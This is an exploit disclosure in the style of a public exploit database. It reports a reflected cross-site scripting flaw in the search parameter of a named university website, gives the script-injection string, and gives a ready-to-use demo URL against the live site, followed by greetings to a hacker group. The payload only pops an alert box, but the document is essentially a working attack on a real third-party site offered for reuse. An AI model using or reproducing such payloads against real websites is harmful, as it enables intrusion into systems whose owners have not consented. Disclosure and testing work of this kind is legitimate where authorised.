##########################
# Exploit Title: MJM Usm Cross Site Scripting
# Date: 2017-10-17
# Discovered By: ArashHC
# Tested on : Win10, Win8, Kali Linux
##########################
#Vulnerability is the site search field
q parameter have bug!
Inject this code after q=
"><script>alert('ArashHC')</script>
##########################
# Demo : http://mjm.usm.my/index.php?r=/cms/entry/search&q="><script>alert('CyberSoldiersST')</script>
# Only on firefox webbrowser!!
##########################
# Thanks to : EreBus, RexProg, Crazy_Boy, AVENGER, ViRuS007, BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg
# https://t.me/CyberSoldiersST
# Discovered By: ArashHC